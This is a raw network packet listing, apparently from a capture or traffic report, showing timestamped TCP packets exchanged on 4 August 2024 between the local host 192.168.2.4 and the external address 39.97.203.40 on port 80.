                                          Aug 4, 2024 12:47:10.330319881 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.330332994 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.330379963 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.331022978 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.331057072 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.331088066 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.331105947 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.331120014 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.331162930 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.346673965 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.346766949 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.346802950 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.346937895 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.347290993 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.347340107 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.347374916 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.347410917 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.347529888 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.347531080 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.371623039 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.371690035 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.371759892 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.371793985 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.371828079 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.371861935 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.371896982 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.371956110 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.371956110 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.371956110 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.371956110 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.379512072 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.379559994 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.379601002 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.379642963 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.379657030 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.379690886 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.379707098 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.379726887 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.379762888 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.379782915 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.380327940 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.380386114 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.380397081 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.380434036 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.380467892 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.380475044 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.380532980 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.380565882 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.380595922 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.380604029 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.380640984 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.388431072 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.388511896 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.388576031 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.388576031 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.388628960 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.388664007 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.388681889 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.388698101 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.388732910 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.388752937 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.388770103 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.388824940 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.389575005 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.389624119 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.389658928 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.389692068 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.389725924 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.389763117 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.389812946 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.389813900 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.389813900 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.397687912 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.397757053 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.397793055 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.397825956 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.397840977 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.397861004 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.397895098 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.397907972 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.397937059 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.397964001 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.398119926 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.398175001 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.413093090 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413141966 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413178921 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413216114 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413269997 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413326025 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.413400888 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.413485050 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413538933 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413573027 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413698912 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.413700104 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.413806915 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413841009 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413876057 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413892031 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.413913012 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.413963079 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.414385080 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.414418936 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.414465904 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.414473057 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.414508104 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.414540052 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.414552927 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.414575100 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.414608002 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.414622068 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.415270090 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.415321112 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.415322065 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.415354967 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.415389061 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.415402889 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.415421963 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.415455103 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.415468931 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.415488958 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.415524006 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.415538073 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.416270018 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.416304111 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.416321993 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.416337967 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.416371107 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.416387081 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.416405916 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.416439056 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.416452885 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.416474104 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.416520119 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.416527033 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.417160034 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.417193890 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.417211056 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.417227983 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.417262077 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.417277098 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.417295933 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.417329073 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.417344093 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.417361975 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.417396069 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.417408943 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.417428970 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.417476892 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.418118000 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.418153048 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.418186903 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.418205976 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.418220997 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.418253899 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.418276072 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.418287992 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.418320894 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.418337107 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.418353081 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.418402910 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.419085026 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.419117928 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.419152021 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.419167995 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.419186115 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.419218063 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.419249058 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.419250965 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.419284105 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.419296026 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.419317007 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.419349909 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.419364929 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.420053959 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.420101881 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.420114994 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.420136929 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.420186043 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.437793016 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.437840939 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.437876940 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.438035011 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.438352108 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.438400984 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.438435078 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.438472986 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.438558102 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.438558102 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.460059881 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.460130930 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.460167885 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.460201025 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.460235119 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.460268021 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.460273027 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.460273027 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.460273027 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.460304022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.460333109 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.460345030 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.468333960 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.468377113 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.468435049 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.468470097 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.468524933 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.468524933 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.468549013 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.468583107 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.468595028 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.468617916 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.468651056 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.468687057 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.468686104 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.468734026 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.469018936 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.469053030 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.469089031 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.469111919 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.469118118 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.469165087 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.469655037 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.469707012 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.469770908 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.479763031 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.479832888 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.479868889 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.479903936 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.479938984 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.479971886 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.480004072 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.480004072 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.480011940 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.480079889 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.482127905 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.482168913 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.482232094 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.482285023 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.482316017 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.482317924 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.482317924 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.482347965 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.482382059 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.482384920 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.482413054 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.482445002 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.482448101 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.482475996 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.482501984 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.482562065 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.482619047 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.488831043 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.488917112 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.488955021 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.489098072 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.489131927 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.489165068 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.489198923 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.489216089 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.489217043 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.489217043 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.502582073 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.502630949 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.502665997 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.502700090 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.502733946 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.502767086 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.502788067 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.502788067 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.502788067 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.502804041 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.502866030 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.502948999 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.502983093 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.503019094 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.503055096 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.503164053 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.503164053 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.503222942 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.503361940 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.503412008 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.503417015 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.503446102 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.503479004 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.503499985 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.503514051 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.503547907 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.503571033 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.503583908 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.503632069 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.504439116 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.504517078 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.504551888 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.504573107 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.504585981 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.504621029 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.504643917 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.504654884 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.504688025 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.504702091 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.504722118 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.504769087 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.505140066 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.505193949 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.505234957 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.505256891 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.505269051 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.505301952 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.505321980 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.505336046 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.505369902 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.505388975 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.505407095 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.505455017 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.506247044 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.506282091 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.506314039 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.506333113 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.506347895 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.506381989 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.506401062 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.506416082 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.506447077 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.506467104 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.506480932 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.506514072 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.506531000 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.507082939 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.507116079 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.507138014 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.507148981 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.507181883 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.507200956 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.507215977 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.507249117 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.507270098 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.507281065 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.507314920 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.507328033 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.508049011 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.508080959 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.508105040 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.508114100 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.508147955 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.508161068 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.508182049 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.508214951 CEST804973539.97.203.40192.168.2.4
